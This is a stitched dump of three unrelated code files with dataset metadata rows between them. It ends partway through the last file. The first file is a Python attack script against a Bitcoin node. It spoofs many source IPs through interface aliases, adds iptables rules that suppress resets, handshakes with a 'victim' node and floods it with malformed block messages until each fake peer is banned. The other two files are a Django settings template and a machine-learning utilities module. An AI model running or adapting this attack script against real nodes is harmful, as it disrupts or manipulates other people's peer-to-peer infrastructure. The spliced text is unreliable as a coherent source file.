#hashMerkleRoot='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
nTime=nTime,
nBits=0,
nNonce=nNonce,
vtx=()
)
name = 'block'
f = _BytesIO()
msg.stream_serialize(f)
body = f.getvalue()
res = b'\xf9\xbe\xb4\xd9'
res += name.encode()
res += b"\x00" * (12 - len(name))
res += struct.pack(b"<I", len(body))
#th = hashlib.sha256(body).digest() # add checksum
#h = hashlib.sha256(th).digest()
#res += h[:4]
res += bytearray(random.getrandbits(8) for _ in range(4))
res += body
return res
# Construct a version packet using python-bitcoinlib
def version_packet(src_ip, dst_ip, src_port, dst_port):
msg = msg_version(bitcoin_protocolversion)
msg.nVersion = bitcoin_protocolversion
msg.addrFrom.ip = src_ip
msg.addrFrom.port = src_port
msg.addrTo.ip = dst_ip
msg.addrTo.port = dst_port
# Default is /python-bitcoinlib:0.11.0/
msg.strSubVer = bitcoin_subversion.encode() # Look like a normal node
return msg
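# A fake handshake then starts with something like (hypothetical addresses):
#   pkt = version_packet('10.0.0.5', '10.0.0.9', 5555, 8333)
#   sock.send(pkt.to_bytes())
# which is exactly what make_fake_connection() below does after connecting.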
# Close a connection
def close_connection(socket, ip, port, interface):
socket.close()
terminal(f'sudo ifconfig {interface} {ip} down')
if socket in identity_socket: identity_socket.remove(socket)
else: del socket
if interface in identity_interface: identity_interface.remove(interface)
if (ip, port) in identity_address: identity_address.remove((ip, port))
print(f'Successfully closed connection to ({ip} : {port})')
# Creates a fake connection to the victim
def make_fake_connection(src_ip, dst_ip, verbose=True):
src_port = random.randint(1024, 65535)
dst_port = victim_port
print(f'Creating fake identity ({src_ip} : {src_port}) to connect to ({dst_ip} : {dst_port})...')
interface = ip_alias(src_ip)
identity_interface.append(interface)
if verbose: print(f'Successfully set up IP alias on interface {interface}')
if verbose: print('Resulting ifconfig interface:')
if verbose: print(terminal(f'ifconfig {interface}').rstrip() + '\n')
if verbose: print('Setting up iptables configurations')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL RST,ACK -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL FIN,ACK -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL FIN -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL RST -j DROP')
if verbose: print('Creating network socket...')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if verbose: print(f'Setting socket network interface to "{network_interface}"...')
success = s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, str(network_interface + '\0').encode('utf-8'))
while success == -1:
print(f'Setting socket network interface to "{network_interface}"...')
success = s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, str(network_interface + '\0').encode('utf-8'))
time.sleep(1)
print(network_interface)
if verbose: print(f'Binding socket to ({src_ip} : {src_port})...')
s.bind((src_ip, src_port))
if verbose: print(f'Connecting ({src_ip} : {src_port}) to ({dst_ip} : {dst_port})...')
try:
s.connect((dst_ip, dst_port))
except:
close_connection(s, src_ip, src_port, interface)
make_fake_connection(random_ip(), dst_ip, False)
return
# Send version packet
version = version_packet(src_ip, dst_ip, src_port, dst_port)
s.send(version.to_bytes())
	# Receive the peer's version packet
	verack = s.recv(1024)
# Send verack packet
verack = msg_verack(bitcoin_protocolversion)
s.send(verack.to_bytes())
# Get verack packet
verack = s.recv(1024)
if verbose: print('Connection successful!')
identity_address.append((src_ip, src_port))
identity_socket.append(s)
# Listen to the connections for future packets
	if verbose: print(f'Attaching attacker script to {interface}')
try:
start_new_thread(attack, (), {
'socket': s,
'src_ip': src_ip,
'src_port': src_port,
'dst_ip': dst_ip,
'dst_port': dst_port,
'interface': interface
})
except:
		print(f'Error: unable to start thread to sniff interface {interface}')
# Send block messages repeatedly, until banned
def attack(socket, src_ip, src_port, dst_ip, dst_port, interface):
block = block_packet_bytes()
while True:
if seconds_between_version_packets != 0:
time.sleep(seconds_between_version_packets)
try:
socket.send(block)
except Exception as e:
print(e)
break
close_connection(socket, src_ip, src_port, interface)
print(f'Peer was banned ({src_ip} : {src_port})')
make_fake_connection(random_ip(), dst_ip, False)
# Initialize the network
def initialize_network_info():
print('Retrieving network info...')
global default_gateway, network_interface, broadcast_address
# Get the network interface of the default gateway
m = re.search(r'default +via +([^ ]+) +dev +([^ ]+)', terminal('ip route'))
if m != None:
default_gateway = m.group(1).strip()
network_interface = m.group(2).strip()
else:
print('Error: Network interface couldn\'t be found.')
sys.exit()
# Get the broadcast address of the network interface
# Used as an IP template of what can change, so that packets still come back to the sender
m = re.search(r'broadcast ([^ ]+)', terminal(f'ifconfig {network_interface}'))
if m != None:
broadcast_address = m.group(1).strip()
else:
print('Error: Network broadcast IP couldn\'t be found.')
sys.exit()
# Initialize Bitcoin info
def initialize_bitcoin_info():
print('Retrieving bitcoin info...')
global bitcoin_subversion
global bitcoin_protocolversion
bitcoin_subversion = '/Satoshi:0.18.0/'
bitcoin_protocolversion = 70015
try:
network_info = None #json.loads(bitcoin('getnetworkinfo'))
if 'subversion' in network_info:
bitcoin_subversion = network_info['subversion']
if 'protocolversion' in network_info:
bitcoin_protocolversion = network_info['protocolversion']
except:
pass
# Save a backup of the iptables rules
def backup_iptables():
terminal(f'iptables-save > {iptables_file_path}')
# Restore the backup of the iptables rules
def cleanup_iptables():
if(os.path.exists(iptables_file_path)):
print('Cleaning up iptables configuration')
terminal(f'iptables-restore < {iptables_file_path}')
os.remove(iptables_file_path)
# Remove all ip aliases that were created by the script
def cleanup_ipaliases():
for i in range(0, len(identity_address)):
try:
ip = identity_address[i][0]
interface = identity_interface[i]
print(f'Cleaning up IP alias {ip} on {interface}')
terminal(f'sudo ifconfig {interface} {ip} down')
except: pass
# This function is ran when the script is stopped
def on_close():
print('Closing open sockets')
for socket in identity_socket:
socket.close()
cleanup_ipaliases()
cleanup_iptables()
print('Cleanup complete. Goodbye.')
#print('Verifying that internet works...')
#if not internet_is_active():
# reset_network()
# This is the first code to run
if __name__ == '__main__':
global alias_num
alias_num = 0 # Increments each alias
initialize_network_info()
initialize_bitcoin_info()
atexit.register(on_close) # Make on_close() run when the script terminates
cleanup_iptables() # Restore any pre-existing iptables before backing up, just in case if the computer shutdown without restoring
backup_iptables()
# Create the connections
for i in range(1, num_identities + 1):
try:
make_fake_connection(src_ip = random_ip(), dst_ip = victim_ip)
except ConnectionRefusedError:
print('Connection was refused. The victim\'s node must not be running.')
print(f'Successful connections: {len(identity_address)}\n')
# Prevent the script from terminating when the sniff function is still active
while 1:
time.sleep(60)
| 34.497006 | 359 | 0.743881 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 5,543 | 0.48108 |
4c6289a028d756ccd03ac220d11a9d33117ee573 | 6,530 | py | Python | djcorsche/settings_default.py | carthage-college/django-djcorsche | c43db6e634f5b3fc9c8b0cff80ced8382ca6643c | [
"BSD-3-Clause"
] | null | null | null | djcorsche/settings_default.py | carthage-college/django-djcorsche | c43db6e634f5b3fc9c8b0cff80ced8382ca6643c | [
"BSD-3-Clause"
] | null | null | null | djcorsche/settings_default.py | carthage-college/django-djcorsche | c43db6e634f5b3fc9c8b0cff80ced8382ca6643c | [
"BSD-3-Clause"
] | null | null | null | """
Django settings for project.
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
# Debug
#DEBUG = False
DEBUG = True
TEMPLATE_DEBUG = DEBUG
INFORMIX_DEBUG = "debug"
ADMINS = (
('', ''),
)
MANAGERS = ADMINS
SECRET_KEY = ''
ALLOWED_HOSTS = []
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Chicago'
SITE_ID = 1
USE_I18N = False
USE_L10N = False
USE_TZ = False
DEFAULT_CHARSET = 'utf-8'
FILE_CHARSET = 'utf-8'
SERVER_URL = ""
API_URL = "%s/%s" % (SERVER_URL, "api")
LIVEWHALE_API_URL = "https://%s" % (SERVER_URL)
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
ROOT_DIR = os.path.dirname(__file__)
ROOT_URL = "/djskeletor/"
ROOT_URLCONF = 'djskeletor.core.urls'
WSGI_APPLICATION = 'djskeletor.wsgi.application'
MEDIA_ROOT = ''
ADMIN_MEDIA_PREFIX = '/static/admin/'
STATIC_ROOT = ''
STATIC_URL = "/static/"
STATICFILES_DIRS = ()
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
DATABASES = {
'default': {
'HOST': '127.0.0.1',
'PORT': '3306',
'NAME': 'django_djskeletor',
'ENGINE': 'django.db.backends.mysql',
#'ENGINE': 'django.db.backends.dummy',
'USER': '',
'PASSWORD': ''
},
}
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.formtools',
'django.contrib.humanize',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
'djskeletor',
'djskeletor.core',
'djskeletor.myapp',
'djtools',
)
MIDDLEWARE_CLASSES = (
'django.middleware.cache.UpdateCacheMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.cache.FetchFromCacheMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# the following should be uncommented unless you are
# embedding your apps in iframes
#'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# template stuff
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
TEMPLATE_DIRS = (
"/data2/django_projects/djskeletor/templates/",
"/data2/django_templates/djkorra/",
"/data2/django_templates/djcher/",
"/data2/django_templates/",
)
TEMPLATE_CONTEXT_PROCESSORS = (
"djtools.context_processors.sitevars",
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.request",
"django.core.context_processors.debug",
"django.core.context_processors.media",
)
# caching
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
#'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
#'LOCATION': '127.0.0.1:11211',
#'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
#'LOCATION': '/var/tmp/django_djskeletor_cache',
#'TIMEOUT': 60*20,
#'KEY_PREFIX': "DJSKELETOR_",
#'OPTIONS': {
# 'MAX_ENTRIES': 80000,
#}
}
}
CACHE_MIDDLEWARE_ANONYMOUS_ONLY = True
# LDAP Constants
LDAP_SERVER = ''
LDAP_SERVER_PWM = ''
LDAP_PORT = ''
LDAP_PORT_PWM = ''
LDAP_PROTOCOL = ""
LDAP_PROTOCOL_PWM = ""
LDAP_BASE = ""
LDAP_USER = ""
LDAP_PASS = ""
LDAP_EMAIL_DOMAIN = ""
LDAP_OBJECT_CLASS = ""
LDAP_OBJECT_CLASS_LIST = []
LDAP_GROUPS = {}
LDAP_RETURN = []
LDAP_RETURN_PWM = []
LDAP_ID_ATTR = ""
LDAP_CHALLENGE_ATTR = ""
# auth backends
AUTHENTICATION_BACKENDS = (
'djauth.ldapBackend.LDAPBackend',
'django.contrib.auth.backends.ModelBackend',
)
LOGIN_URL = '/djskeletor/accounts/login/'
LOGIN_REDIRECT_URL = '/djskeletor/'
USE_X_FORWARDED_HOST = True
#SESSION_ENGINE = "django.contrib.sessions.backends.cache"
SESSION_EXPIRE_AT_BROWSER_CLOSE = False
SESSION_COOKIE_DOMAIN = ".carthage.edu"
SESSION_COOKIE_NAME = 'django_djskeletor_cookie'
SESSION_COOKIE_AGE = 86400
# SMTP settings
EMAIL_HOST = ''
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
EMAIL_USE_TLS = True
EMAIL_PORT = 587
EMAIL_FAIL_SILENTLY = False
DEFAULT_FROM_EMAIL = ''
SERVER_EMAIL = ''
SERVER_MAIL = ''
# logging
LOG_FILEPATH = os.path.join(os.path.dirname(__file__), "logs/")
LOG_FILENAME = LOG_FILEPATH + "debug.log"
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'standard': {
'format' : "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
'datefmt' : "%Y/%b/%d %H:%M:%S"
},
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s',
'datefmt' : "%Y/%b/%d %H:%M:%S"
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'null': {
'level':'DEBUG',
'class':'django.utils.log.NullHandler',
},
'logfile': {
'level':'DEBUG',
'class':'logging.handlers.RotatingFileHandler',
'filename': LOG_FILENAME,
'maxBytes': 50000,
'backupCount': 2,
'formatter': 'standard',
},
'console':{
'level':'INFO',
'class':'logging.StreamHandler',
'formatter': 'standard'
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'include_html': True,
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'djskeletor': {
'handlers':['logfile'],
'propagate': True,
'level':'DEBUG',
},
'django': {
'handlers':['console'],
'propagate': True,
'level':'WARN',
},
'django.db.backends': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': False,
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| 27.552743 | 96 | 0.620214 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,590 | 0.54977 |
4c64de6df990440fb9bf292eb702bdb614dfcfae | 22,653 | py | Python | utils.py | atward424/ASCVD_ML | 39404dd5f50a527576b91e8f53f5157f76382712 | [
"Apache-2.0"
] | 1 | 2021-04-08T07:05:18.000Z | 2021-04-08T07:05:18.000Z | utils.py | atward424/ASCVD_ML | 39404dd5f50a527576b91e8f53f5157f76382712 | [
"Apache-2.0"
] | null | null | null | utils.py | atward424/ASCVD_ML | 39404dd5f50a527576b91e8f53f5157f76382712 | [
"Apache-2.0"
] | 1 | 2021-04-08T07:07:53.000Z | 2021-04-08T07:07:53.000Z | import numpy as np
import pandas as pd
import scipy.stats as st
#from medical_ML import Experiment
import matplotlib.pyplot as plt
import xgboost as xgb
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
from sklearn.dummy import DummyClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression, Lasso
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn import linear_model
from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor
from sklearn.dummy import DummyRegressor
def split_cohort(datafile, to_exclude = None, test_ind_col = None, drop = 'some'):
""" Load and clean the dataset
"""
if isinstance(datafile, str):
data = pd.read_csv(datafile)
else:
data = datafile
test_data = None
if to_exclude is not None:
for k in to_exclude.keys():
if k == 'race':
data = data[data[k].isin(to_exclude[k])]
elif k == 'agebl':
data = data[data[k] >= to_exclude[k]]
elif to_exclude[k]:
data = data[data[k] == 0]
if drop == 'some':
data = data.drop(k, axis = 1)
if drop == 'all':
if (k != 'race') & (k != 'agebl'):
data = data.drop(k, axis = 1)
# self.data = self.data[self.data['year'] <= 2010]
# self.data = self.data.drop(['year'], axis = 1)
if test_ind_col is not None:
test_data = data[data[test_ind_col] == 1]
test_data = test_data.drop(test_ind_col, axis = 1)
data = data[data[test_ind_col] == 0]
data = data.drop(test_ind_col, axis = 1)
return(data, test_data)
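# Usage sketch (hypothetical file and column names):
#   train_df, test_df = split_cohort('cohort.csv',
#                                    to_exclude = {'agebl': 40, 'prior_mi': True},
#                                    test_ind_col = 'test_set')
# keeps rows with agebl >= 40, drops rows where prior_mi == 1 (and, with the
# default drop = 'some', the prior_mi column itself), then splits on the 0/1
# test_set indicator.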
def calc_auc_conf_interval(AUC, N1, N2, ci = 0.95):
# from https://ncss-wpengine.netdna-ssl.com/wp-content/themes/ncss/pdf/Procedures/PASS/Confidence_Intervals_for_the_Area_Under_an_ROC_Curve.pdf
zsc = st.norm.ppf(1 - (1-ci)/2.)
q1 = AUC / (2 - AUC)
q2 = (2 * AUC * AUC) / (1 + AUC)
numerator = AUC * (1 - AUC) + (N1 - 1) * (q1 - AUC * AUC) + (N2 - 1) * (q2 - AUC * AUC)
denom = N1 * N2
se_AUC = np.sqrt(numerator / denom)
return (se_AUC, AUC - zsc * se_AUC, AUC, AUC + zsc * se_AUC)
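# Worked example (values rounded): with AUC = 0.8, N1 = 50 positives and
# N2 = 100 negatives, q1 ~ 0.667 and q2 ~ 0.711, giving se_AUC ~ 0.041 and a
# 95% CI of roughly (0.719, 0.881).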
def load_models_and_parameters_default():
models_and_parameters = {
'dummy_reg': (DummyRegressor(),
{"strategy": ["mean"]}),
'lasso_reg': (linear_model.Lasso(),
{'alpha': np.arange(0.1, 1.0, 0.01),
'max_iter': [10000]}),
'rf_reg': (RandomForestRegressor(),
{'n_estimators': [501],
'criterion': ['mae'],
'max_depth': [3, 5, 10],
'max_features': ['auto', 'sqrt', 'log2']}),
'gbm_reg': (GradientBoostingRegressor(),
{'n_estimators': [501],
'criterion': ['mae'],
# 'loss': ['ls', 'lad'],
'max_depth': [3, 5, 10],
'max_features': ['auto', 'sqrt', 'log2']}),
'dummy': (DummyClassifier(),
{"strategy": ["most_frequent"]}),
# 'logreg': (LogisticRegression(),
# {"class_weight": [None],
# "C":[0.1, 0.3, 1,5, 10]}), #, "balanced"
# 'logreg': (LogisticRegression(),
# {"class_weight": [None],
# "C":[0.01,0.1, 1]}), #, "balanced"
# "C":[0.1]}), #, "balanced"
'logreg': (LogisticRegression(),
{}), #, "balanced"
# "C":[0.1]}), #, "balanced"
'lasso': (Lasso(),
{"alpha": [0.0001, 0.001],#np.arange(0.01, 1.01, 0.05),
'max_iter': [10000]}),
# 'lasso2': (LogisticRegression(penalty = 'l1'),
# {"C":[0.001, 0.01,0.1, 1]}),
'lasso2': (LogisticRegression(penalty = 'l1',solver ='saga'),
{}),
'elnet': (LogisticRegression(penalty = 'elasticnet', solver = 'saga'),
{"C":[0.001, 0.01,0.1, 1],
"l1_ratio":[0.01, 0.1, 0.5, 0.9, 0.99]}),
'dt': (DecisionTreeClassifier(),
{"criterion": ["entropy"],
# "max_depth": [2, 3, 4, 5, 10, 20], # None
"max_depth": [1, 2, 3, 4], # None
"splitter": ["best", "random"],
"min_samples_split": [2, 5, 10],
"min_samples_leaf": [3, 5, 10, 15, 20],
"random_state": [817263]}),
'svm': (SVC(),
{'C': [ 1],
'kernel': ['linear']}), #'poly', 'rbf'
'knn': (KNeighborsClassifier(),
{'n_neighbors': [2, 3, 5, 10, 20, 50],
'weights': ['uniform', 'distance']}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [501],
# 'max_depth': [3, 5, 10],
# 'max_features': ['auto', 'sqrt', 'log2']}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [50, 100, 501, 1000],
# 'max_depth': [3,5,7],
# "min_samples_split": [2, 5],
# 'max_features': ['auto', 0.5],
# "class_weight": [None, "balanced"]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [501],
# 'max_depth': [5],
# "min_samples_split": [5],
# 'max_features': ['auto'],
# "class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [ 501, 1000, 2000, 4000],
# 'max_depth': [5, 7, 9, 11, 13],
# "min_samples_split": [2],
# 'max_features': ['sqrt', 0.25, 0.5, 0.75, 1.0],
# "class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [200, 500, 1000],
# 'max_depth': [4, 6, 8, 10],
# "min_samples_split": [2, 10],
# 'max_features': [0.25, 0.5],
# "class_weight": [None]}),
'rf': (RandomForestClassifier(),
{'n_estimators': [800],
'max_depth': [8],
"min_samples_split": [10],
'max_features': [0.25],
"class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [400, 500, 600],
# 'max_depth': [7,8,9],
# "min_samples_split": [5,10],
# 'max_features': [0.25, 0.5, ]}),
# 'rf': (RandomForestClassifier(),
# {}),
'xgb': (xgb.XGBClassifier(),
{}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [600],
# 'max_depth': [9],
# "min_samples_split": [10],
# 'max_features': [0.25]}),
#
# 'xgb': (xgb.XGBClassifier(),
# {'n_estimators': [100,500],
# 'max_depth': [3,4,5],
# 'learning_rate': [0.1, 0.3],
# "reg_alpha": [0, 1],
# "reg_lambda": [0.1, 1]}),
# 'xgb': (xgb.XGBClassifier(),
# {'n_estimators': [500],
# 'max_depth': [4],
# 'learning_rate': [0.1],
# "reg_alpha": [0, 10],
# "reg_lambda": [0.1, 10]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [200, 300],
# 'learning_rate': [0.01],
# 'max_depth': [3,4,5],
# 'subsample': [0.35, 0.7],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [400],
# 'learning_rate': [0.01],
# 'max_depth': [5],
# 'subsample': [0.75],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [300, 400, 500],
# 'learning_rate': [0.01, 0.003, 0.4],
# 'max_depth': [5, 6, 7],
# 'subsample': [0.85, 1],
# 'max_features': [0.25, 0.5]}),
'gbm': (GradientBoostingClassifier(),
{}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [100, 200, 300, 500, 1000, 2000,
# 4000],
# 'max_depth': [2, 3, 4, 5, 6, 7,
# 9],
# 'subsample': [0.75,
# 1],
# 'max_features': ['sqrt', 'log2', 0.25, 0.5, 0.75,
# 1.0]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [100, 200, 400, 800],
# 'learning_rate': [0.03, 0.01, 0.001],
# 'max_depth': [4,5,6,8],
# 'subsample': [0.85],
# 'max_features': [0.25, 0.5]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [400, 600],
# 'learning_rate': [0.01],
# 'max_depth': [5, 6],
# 'subsample': [0.85],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [25, 50, 75, 100, 200],
# 'max_depth': [2,3,5],
# 'subsample': [0.25, 0.5, 0.75, 1],
# 'max_features': [None, 'sqrt', 'log2', 0.5]}),
}
return(models_and_parameters)
def load_models_and_parameters():
models_and_parameters = {
'dummy_reg': (DummyRegressor(),
{"strategy": ["mean"]}),
'lasso_reg': (linear_model.Lasso(),
{'alpha': np.arange(0.1, 1.0, 0.01),
'max_iter': [10000]}),
'rf_reg': (RandomForestRegressor(),
{'n_estimators': [501],
'criterion': ['mae'],
'max_depth': [3, 5, 10],
'max_features': ['auto', 'sqrt', 'log2']}),
'gbm_reg': (GradientBoostingRegressor(),
{'n_estimators': [501],
'criterion': ['mae'],
# 'loss': ['ls', 'lad'],
'max_depth': [3, 5, 10],
'max_features': ['auto', 'sqrt', 'log2']}),
'dummy': (DummyClassifier(),
{"strategy": ["most_frequent"]}),
# 'logreg': (LogisticRegression(),
# {"class_weight": [None],
# "C":[0.1, 0.3, 1,5, 10]}), #, "balanced"
'logreg': (LogisticRegression(),
{"class_weight": [None],
"C":[0.01,0.1, 1]}), #, "balanced"
# "C":[0.1]}), #, "balanced"
# 'logreg': (LogisticRegression(),
# {}), #, "balanced"
# # "C":[0.1]}), #, "balanced"
'lasso': (Lasso(),
{"alpha": [0.0001, 0.001],#np.arange(0.01, 1.01, 0.05),
'max_iter': [10000]}),
'lasso2': (LogisticRegression(penalty = 'l1', solver ='saga'),
{"C":[0.001, 0.01,0.1, 1]}),
# 'lasso2': (LogisticRegression(penalty = 'l1'),
# {}),
'elnet': (LogisticRegression(penalty = 'elasticnet', solver = 'saga'),
{"C":[0.001, 0.01,0.1, 1],
"l1_ratio":[0.01, 0.1, 0.5, 0.9, 0.99]}),
'dt': (DecisionTreeClassifier(),
{"criterion": ["entropy"],
# "max_depth": [2, 3, 4, 5, 10, 20], # None
"max_depth": [1, 2, 3, 4], # None
"splitter": ["best", "random"],
"min_samples_split": [2, 5, 10],
"min_samples_leaf": [3, 5, 10, 15, 20],
"random_state": [817263]}),
'svm': (SVC(),
{'C': [ 1],
'kernel': ['linear']}), #'poly', 'rbf'
'knn': (KNeighborsClassifier(),
{'n_neighbors': [2, 3, 5, 10, 20, 50],
'weights': ['uniform', 'distance']}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [501],
# 'max_depth': [3, 5, 10],
# 'max_features': ['auto', 'sqrt', 'log2']}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [50, 100, 501, 1000],
# 'max_depth': [3,5,7],
# "min_samples_split": [2, 5],
# 'max_features': ['auto', 0.5],
# "class_weight": [None, "balanced"]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [501],
# 'max_depth': [5],
# "min_samples_split": [5],
# 'max_features': ['auto'],
# "class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [ 501, 1000, 2000, 4000],
# 'max_depth': [5, 7, 9, 11, 13],
# "min_samples_split": [2],
# 'max_features': ['sqrt', 0.25, 0.5, 0.75, 1.0],
# "class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [200, 500, 1000],
# 'max_depth': [4, 6, 8, 10],
# "min_samples_split": [2, 10],
# 'max_features': [0.25, 0.5],
# "class_weight": [None]}),
'rf': (RandomForestClassifier(),
{'n_estimators': [500, 1000],
'max_depth': [8],
"min_samples_split": [10],
'max_features': [0.25],
"class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [400, 500, 600],
# 'max_depth': [7,8,9],
# "min_samples_split": [5,10],
# 'max_features': [0.25, 0.5, ]}),
# 'rf': (RandomForestClassifier(),
# {}),
# 'xgb': (xgb.XGBClassifier(),
# {}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [600],
# 'max_depth': [9],
# "min_samples_split": [10],
# 'max_features': [0.25]}),
#
# 'xgb': (xgb.XGBClassifier(),
# {'n_estimators': [100,500],
# 'max_depth': [3,4,5],
# 'learning_rate': [0.1, 0.3],
# "reg_alpha": [0, 1],
# "reg_lambda": [0.1, 1]}),
# 'xgb': (xgb.XGBClassifier(),
# {'n_estimators': [500],
# 'max_depth': [4],
# 'learning_rate': [0.1],
# "reg_alpha": [0, 10],
# "reg_lambda": [0.1, 10]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [200, 300],
# 'learning_rate': [0.01],
# 'max_depth': [3,4,5],
# 'subsample': [0.35, 0.7],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [400],
# 'learning_rate': [0.01],
# 'max_depth': [5],
# 'subsample': [0.75],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [300, 400, 500],
# 'learning_rate': [0.01, 0.003, 0.4],
# 'max_depth': [5, 6, 7],
# 'subsample': [0.85, 1],
# 'max_features': [0.25, 0.5]}),
# 'gbm': (GradientBoostingClassifier(),
# {}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [100, 200, 300, 500, 1000, 2000,
# 4000],
# 'max_depth': [2, 3, 4, 5, 6, 7,
# 9],
# 'subsample': [0.75,
# 1],
# 'max_features': ['sqrt', 'log2', 0.25, 0.5, 0.75,
# 1.0]}),
'gbm': (GradientBoostingClassifier(),
{'n_estimators': [100, 200, 400, 800],
'learning_rate': [0.03, 0.01, 0.001],
'max_depth': [4,5,6,8],
'subsample': [0.85],
'max_features': [0.25, 0.5]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [400, 600],
# 'learning_rate': [0.01],
# 'max_depth': [5, 6],
# 'subsample': [0.85],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [25, 50, 75, 100, 200],
# 'max_depth': [2,3,5],
# 'subsample': [0.25, 0.5, 0.75, 1],
# 'max_features': [None, 'sqrt', 'log2', 0.5]}),
}
return(models_and_parameters)
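# Usage sketch (not in the original file): each entry above is an
# (estimator, parameter_grid) pair shaped for sklearn's GridSearchCV, e.g.:
# from sklearn.model_selection import GridSearchCV
# est, grid = load_models_and_parameters()['logreg']
# search = GridSearchCV(est, grid, cv=5, scoring='roc_auc').fit(X_train, y_train)
# (X_train and y_train stand in for the caller's data.)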
def calc_metrics(y_true, y_pred, return_all = False):
res_df = pd.DataFrame({'y_true' : y_true,
'y_pred': y_pred}, columns = ['y_pred', 'y_true'])
res_df = res_df.sort_values(by = 'y_pred')
res_df['TN'] = (res_df.y_true == 0).cumsum()
res_df['FN'] = (res_df.y_true == 1).cumsum()
if return_all == False:
res_df = pd.concat([pd.DataFrame({'y_true' : -1,
'y_pred': -1,
"TN": 0,
"FN":0},
index = [-1],
columns = ['y_pred', 'y_true', 'TN', "FN"]),
res_df], axis = 0)
res_df['TP'] = (res_df.y_true == 1).sum() - res_df['FN']
res_df['FP'] = (res_df.y_true == 0).sum() - res_df['TN']
res_df['sens'] = res_df.TP / (res_df.TP + res_df.FN)
res_df['spec'] = res_df.TN / (res_df.TN + res_df.FP)
res_df['PPV'] = res_df.TP / (res_df.TP + res_df.FP)
res_df['accuracy'] = (res_df.TP + res_df.TN) / (res_df.shape[0])
res_df['f1_score'] = 2 * res_df.PPV * res_df.sens / (res_df.PPV + res_df.sens)
res_df['youdens_index'] = res_df.sens + res_df.spec - 1
